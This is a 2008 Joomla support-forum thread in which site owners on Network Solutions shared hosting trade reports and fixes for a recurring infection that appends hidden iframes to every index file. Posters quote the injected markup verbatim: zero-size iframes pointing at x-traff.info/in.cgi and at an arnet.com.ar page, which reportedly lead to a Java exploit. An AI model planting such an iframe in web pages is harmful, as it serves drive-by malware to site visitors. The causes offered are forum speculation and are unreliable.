http://x-traff.info/in.cgi

tlhostetter · **Joined:** Thu Feb 28, 2008 8:56 pm **Posts:** 7

Something is inserting the following html into all of the index.html files on my joomla site:

<iframe src="http://x-traff.info/in.cgi?default" width="0" height="0" frameborder="0"></iframe>

It has infected 289 files. I have all the files and directories on the site set to 775.

Joomla Version: 1.0.13
PHP Version: 4.4.7
Shared Hosting
URL to our site: http://www.harvestusa.org

This happened about a month ago and I simply removed the above html from each file, plus updated to 1.0.13.

Help!

pe7er · **Posted:** Thu Feb 28, 2008 11:46 pm

Could you check if all necessary Joomla files are available (and not corrupted) on the server?
Joomla Diagnostics is a helpful tool to check that:
http://extensions.joomla.org/component/ ... Itemid,35/

Furthermore I would recommend upgrading to 1.0.15.
(backup your current site + database first!)

Recommended reading:
You think you're site got hacked? Read this first, please!!! viewtopic.php?t=54006
Joomla Administrator's Security Checklist http://help.joomla.org/component/option ... temid,268/
List of Vulnerable 3rd Party/Non Joomla! Extensions http://help.joomla.org/component/option ... temid,268/

Joomla! Tools Suite v1.0 & Health, Installation and Security Audit Tool viewtopic.php?t=136328
Download: Joomla! Tools Suite (JTS-sa) & HISA (HISA-sa) http://extensions.joomla.org/component/ ... Itemid,35/

musiqcentral · **Joined:** Tue Feb 05, 2008 11:51 pm **Posts:** 25

this could also be your host that is implanting this..... ask your host if they ad banners or frames to your pages normal tactics on freehosts.

tlhostetter · **Joined:** Thu Feb 28, 2008 8:56 pm **Posts:** 7

Well .. this is what I ended up doing:

1. I upgraded the site from 1.0.13 to 1.0.15.
2. Copied down all the Joomla files.
3. Did a search-n-replace in all of the affected files.
4. Uploaded the entire site.

Here's where I began to have a different problem. When I attempted to log in to the backend, I got the following error:

mosmsg=Invalid%20Session

I could not log in. I then began to google around and found this link with a fix that fixed the problem:

http://forum.bbpixel.com/index.php?showtopic=4018

The code contained updates to the administrator index.php file and the includes joomla.php file. I am attaching the files.

Our ISP is Network Solutions, which we are on a shared server. I plan on contacting them about the issue. I did find this link, which had some explanation as to how this may have infected our files:

http://ddanchev.blogspot.com/2008/02/se ... ising.html

If I find out any more, I will respond to this post.

Cheers!

tlhostetter · **Joined:** Thu Feb 28, 2008 8:56 pm **Posts:** 7

Peter .. thanks for the links .. I'll definitely review them.

Regards,
- Troy

PatricknHawaii · **Joined:** Mon Dec 10, 2007 4:22 pm **Posts:** 7

I will follow this closely because I just picked up a new client and their site has this problem (same Joomla specs and host).

Thanks, Pat

leolam · **Posted:** Mon Mar 03, 2008 7:51 am

This is a spyware exploit. There's an invisible iframe that points to x-traff.info/stds/go.php which redirects to coripastares.com which in turn serves a java exploit. you simply have been hacked and you need a security check on your site....

Problem is though that this only happens at present with site that are hosted on Networksolutions. I picked up a cached post from the YaBB-forum:

Quote:

Post by ZachMatthews on 02/29/08 at 08:28:38
YaaBB Support (English) >> General Usage and Feature Troubleshooting >> YABB 2.1 - Network Solutions Hacked

Hey guys -

Bad news, guys. YaBB 2.1 has been hacked in a pretty big way (which you may already know about). This post is to serve two functions: (1) to tell you how to tell your users to fix their computers and (2) to see if YaBB 2.2 has fixed this vulnerability.

(1) The hack is an <iframe> exploit that is currently affecting Network Solutions' UNIX servers ONLY. If you are using a Windows Server package, it's not a problem.

The hack is simple: somehow the hacker exploits a vulnerability in YaBB 2.1 to put <iframe> redirect links in the bottom of each Index page, throughout your site. That means, not just YaBB's indexes, but also any other index.php or index.html file anywhere in your FTP server.

The symptoms are these: the redirect points the browser to x-traffic.info, a spammer's site, which then redirects to coripastares.com, another spammer's site. It then loads a Java exploit which most virus scanners should have no problems with. However, somehow this exploit causes Firefox browsers on PCs only to type backwards. Every word becomes sdarwkcab, you follow me?

Macintoshes are vulnerable to the Javascript hack in both Safari and Firefox, but the script doesn't seem to do anything.

The solution in both cases for users is to clear the Java console memory. Not the Temporary Internet Files, but the JAVE CONSOLE files. This is accomplished in various ways, but basically just go to the Java engine's specific menu and find the clear cache button.

(2) Is this exploit still a vulnerability in YaBB 2.2? Network Solutions assures me they are working on clearing the virus from their end, but in the mean time, the vulnerability is serious in YaBB 2.1. I plan to upgrade boards this weekend; will this fix my problem?

Thanks,
Zach

So I advise the 2 of you to contact Network Solutions since cleaning your site wont help if NS is not secured as the post is correct. You can only check this by contacting Network Solutions and point them to this issue

Leo

PatricknHawaii · **Joined:** Mon Dec 10, 2007 4:22 pm **Posts:** 7

leolam wrote:

I advise the 2 of you to contact Network Solutions since cleaning your site wont help if NS is not secured...

Thanks Leo! -Pat

tlhostetter · **Joined:** Thu Feb 28, 2008 8:56 pm **Posts:** 7

Well .. this is my response from Network Solutions! Seems like their exempting themselves. This response is from their 3rd level technical support.

Quote:

The issue you reported to Network Solutions on 3/3/2008 10:21:30 AM and assigned Service Request 1-330090436 has been processed.
You reported an issue with your site being hacked. We looked at your site, and it appears that you have a large number of index.html files infected in your site-back folder. Please restore your site-back folder from backup. To prevent this from happening in the future, we recommend you change your FTP passwords, update any scripts on your site, and scan your computer for viruses.
We apologize for any inconvenience.
Thank you for your patience.
We hope this update has been helpful. However, if you have any additional questions, or feel that the issue has not been completely addressed, please do not hesitate to email our Technical Support Department at technicalsupport@networksolutions.com or call us at 1-866-391-HELP (1-866-391-4357). If calling from outside the U.S. or Canada, please call 570.708.8788

Sincerely,

DAN017
Network Solutions Technical Support

I've already done everything they asked .. even did so the first time this happened and it reappeared. The site-back folder they are referring to is a backup of the base Joomla install, which at the time of the backup was, I think, already compromised.

Interestingly .. the main site has been offline now for 5 days, and has not been compromised, nor have any of the other backup directories. This leads me to believe it only replicates when it can browse (or scan) the site, however this is only speculation.

Any further suggestions?

- Troy

leolam · **Posted:** Thu Mar 06, 2008 2:54 am

logical nothing happens since browser has been offline. read what the exploit does?

pls go to http://prevx.com/ and run the free pc checkup...you will be amazed what they can find. We have this corporate wide running on all pc's and (knock/knock) we have not had a single malware on our systems since the 1 1/2 year we use it now..where programs such as Ad-aware, Mcafee and Panda failed to discover stuff they did within seconds. It checks online every process on/from your pc against a huge database and works flawless

luck my friend

Leo

dinvinci · **Joined:** Thu Mar 06, 2008 4:50 pm **Posts:** 1

I am experiencing the same hack on a Network Solutions hosted site. I'm running a different mySQL/php based CMS, not Joomla. I found the malicious code a few weeks ago and took it off, interestingly at that time it was only affecting the root-level index.php page of the site. Yesterday I found it again, tacked on to the end of the code on every page. I found this topic via Google and put in a support request to NSI. Receiving no response within 24 hours, I called today and got fairly blown off with "you have a vulnerable feedback form on your site." The technician claims I should modify the form code to accept only "short" strings of text from users. I'm a little skeptical, obviously there are zillions of Joomla and other CMS sites out there on other hosts that are not affected, only the NSI-hosted sites. And I should turn off my free-form comments entry field as a solution? WTF? The owner of this particular site is very loyal to NSI so moving the site is not really an option, not yet anyway.

tlhostetter · **Joined:** Thu Feb 28, 2008 8:56 pm **Posts:** 7

Just curious .. are you on a NS shared platform or dedicated platform? We're on shared, and I'm considering going to dedicated, however I'm not confident this would solve the problem. $:-\$

auroramae · **Joined:** Sun May 07, 2006 1:19 am **Posts:** 139

i know it is against web forum etiquette to comment on a thread with me too. But me too.
Network Solutions had me on the phone for less than 2 minutes when he said I've found your problem and he blamed it on joomla being vulnerable. I told I was also not able to FTP and he said... we've changed your password .....hmmmmm. Now why do you think they did that and didn't tell me? There were some strange files my CGI bin that I did not put there and I asked if they belonged to them and he said no. I have no control over the site being on Netsol.

fw116 · **Posted:** Fri Mar 21, 2008 3:58 pm

i read the thread with intrest and i must say, hoster like networksolutions get totaly blocked in our firwalls / networks with such an
lousy abuse management... user get a message where we explain why, and we are done...

if more people would act so, ill bet they have this issue solved in seconds...

no pressure no solution at all...

guitarhangar · **Joined:** Wed Nov 28, 2007 10:16 pm **Posts:** 82

To be honest with you all, even on shared hosting this behavior is pretty unacceptable. I would switch hosting providers ASAP. If it's been 21 days (minimum) since a security notice was issued to the company proper, the problem is widely known, AND they are telling their support staff to blame their customers, I'd bail simply on the principle of ethics, if not their incompetence.

Just my opinion. If someone told me that my site wasn't working "Because I was using Joomla, which is exploitable", I'd respond back with "Read up on your facts and stop spitting the company doctrine." Joomla in and of itself isn't terribly exploitable- and from the looks of it, it wasn't even Joomla that was exploited - it was YaBB (open source bulletin board system), which most of you probably weren't running. I'm not sure if it was Network Solutions YaBB, or one of their clients YaBB that was compromised, but regardless of which case it was, I would classify that behavior as immature professionalism at best.

Vote with your money. Get out of there.

AceFreon · **Joined:** Thu Mar 27, 2008 12:45 am **Posts:** 1

Hi everyone,
Just to add to this thread; I am/was hosted on a Network Solutions unix server and my site was also infected/modified/hacked with the <iframe> tag for x-traf.info. I was experimenting with Joomla! on another host but not on netsol. Every index file on my site had the code added to the end of the file. Even old index files that I had renamed (i.e. index.old.html). The files were modified on the 16th of March and I'm still waiting for Network Solutions to provide a response to the issue. I have moved all my files to a new host and I'm running Joomla! with virtually no issues. (One issue was that my domain was blacklisted because of the attack that I resolved by updating the .htaccess file).
When/If I hear back from netsol, I'll update this thread.
Take care,
Clif

tlhostetter · **Joined:** Thu Feb 28, 2008 8:56 pm **Posts:** 7

Just a quick update for those of you following this thread.

Our site is still operational .. I brought it online about 4 weeks ago, and have not noticed the problem return. I really only did 2 things.

1. Manually removed the script from all the infected files .. what a pain! :eek:

2. Changed my ftp password .. at the recommendation of NetSol.

Not sure if this is a temporary solution, however if this problem returns again, I will let you know.

- Troy

auroramae · **Joined:** Sun May 07, 2006 1:19 am **Posts:** 139

NetSol changed my FTP password without telling me. I found oout when I called them. I thought I had all of the code off the site and opened a "clean" index file and it propagated the i-frame scurge on all the index pages again. Does anyone know how this thing executes?

spetsk · **Joined:** Tue Feb 05, 2008 1:38 pm **Posts:** 3

I have the same problem with my client page.

Code:

<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>

QUICK REPLY: The problem is I can not find where it is written - root path index files look clean. I need to investigate it more...
But it looks like a wide problem.

The page is running on Joomla! 1.0.13 Stable [ Sunglow ] and in their own server.

I have done the session fix about a month ago...

My viewers NOD32 antivirus program is saying that the page has a threat:
HTML/TrojanClicker.IFrame.AG. trojan

That's all I know atm. But to resolve the problem I need to remove the iframe, which files should I look into?

Thanks in advance,
I will let you know if i know more about this problem and will keep an eye on this thread.

holdencreative · **Posted:** Wed Apr 02, 2008 4:41 pm

Quote:

I need to remove the iframe, which files should I look into?

You'll probably find it all over the place in your index.html, and index.php files (or at least I did).

EVERYONE : I can confirm that this is a Network Solution Problem. I've found references to the issue on a number of other non-Joomla sites, and the only commonality in NS Hosting. Support department is either lying, or clueless there.

For a short term solution, can we block the x-traff.info site via .htaccess?
Something like :

Block traffic from a single referrer:

Code:

RewriteEngine on
# Options +FollowSymlinks
RewriteCond %{HTTP_REFERER} x-traff\.info [NC]
RewriteRule .* - [F]

Note that the 'options' line is commented. You may need to uncomment this..

holdencreative · **Posted:** Wed Apr 02, 2008 4:56 pm

Update : Well, I tried that .htaccess solution and it didn't work, commented or not.

Would that mean that :
a) It's not an effective soluton
or (b) This is a DNS / Shared Hosting Issue primarily?

Any ideas?

holdencreative · **Posted:** Wed Apr 02, 2008 11:46 pm

Hey everyone,
I have a programmer working on this full-time here. (A new client called and requested our assistance in solving this problem).

Here's what we've been able to determine :

1) The problem is due to a UNIX virus infection at Network Solutions Shared Hosting.
2) The virus was 'discovered' in late February 08'. Network Solutions originally explained the situation to customers who phoned in. They either haven't notified their hosting support about the problem, or they are just lying to people. (You can guess which one I think it is - my client said that the phone tech guy sounded like he was being directed by 'management').
3) The Virus searches for any file with 'index' in it's name (index.php, index.html, etc.). It adds the malware iframe to the end of the code, but doesn't add any additional code, or delete any existing code, beyond that.

The solution we're trying out is :

1) Download the entire site (and db) locally. Go through and remove the iframe from every "index'" file.
2) Migrate site to a new Web Host

Hopefully this will solve things. I'll update the thread if it does..

holdencreative · **Posted:** Thu Apr 03, 2008 6:43 pm

Here is some information on one of the Viruses that "x-traff" directs users to :

Trojan.Byte.Verify (aka Java.Byte.Verify) Description :
http://www.symantec.com/security_response/writeup.jsp?docid=2003-090514-4048-99

How to Remove :
http://wiki.answers.com/Q/How_do_you_get_rid_of_Java-ByteVerify

*Although AVG worked fine for me.

auroramae · **Joined:** Sun May 07, 2006 1:19 am **Posts:** 139

Has anyone found a solution to this issue? I keep cleaning the site and the iframe keeps reappearing. It is not just affecting the joomla install but another domain hosted on the space with flat html files. I've contacted NetSol again and they are not answering my questions. As noted I have no control over the site being hosted there.

holdencreative · **Posted:** Sat Apr 05, 2008 3:12 pm

Quote:

Has anyone found a solution to this issue?

The virus is on Network Solutions hosting - unless they clean it out, there's no solution immediately available that I see. We've tried cleaning out all the index.php, index.html files, but the <iframe> will return, until it's off their system.

We're still in the process of cleaning the site and moving it to a new host, which should fix things.

gene6482 · **Joined:** Thu Nov 16, 2006 12:55 am **Posts:** 9

I called and was able to get what I believe to be the correct answer. What they said was that it was a php injection that infects folders with 777 permissions. Basically, a cross-server script can be entered into a search box if the search box doesn't clean the entry which creates a hidden file in the folder called .info.php. Inside that file is a php script that basically allows the hacker to run their remote script and modify the other pages.

auroramae · **Joined:** Sun May 07, 2006 1:19 am **Posts:** 139

At first they said I needed to remove joomla because it was the problem. I told them that I have joomla running successfully on other hosts.

Seems like they are also giving you excuses and trying to put the blame on the customer.

NONE of my folders have now nor ever had 777 permissions. They are at 775 or better and are "set gid"

I also have NO FILES called info.php anywhere on my account but even so, the flat index.html files keep getting bombarded with the i-frame code.

I asked them why I can't use a php.ini file to set register globals and they told me that they are so secure that they do not allow the customers to have access to the php.ini file and that the setting register_globals=on is perfectly safe. I tried to override with the .htaccess file to no avail.

holdencreative · **Posted:** Sat Apr 12, 2008 2:46 pm

Update :

Network Solutions seems to have cleared the virus out of our area of shared hosting there. However, this happened once before and then re-occurred (and then it appears that NS lied to us) - so we've migrated to a new host. The problem hasn't occurred again.

Joomla! Discussion Forums

Forum rules

http://x-traff.info/in.cgi

Quick reply

Who is online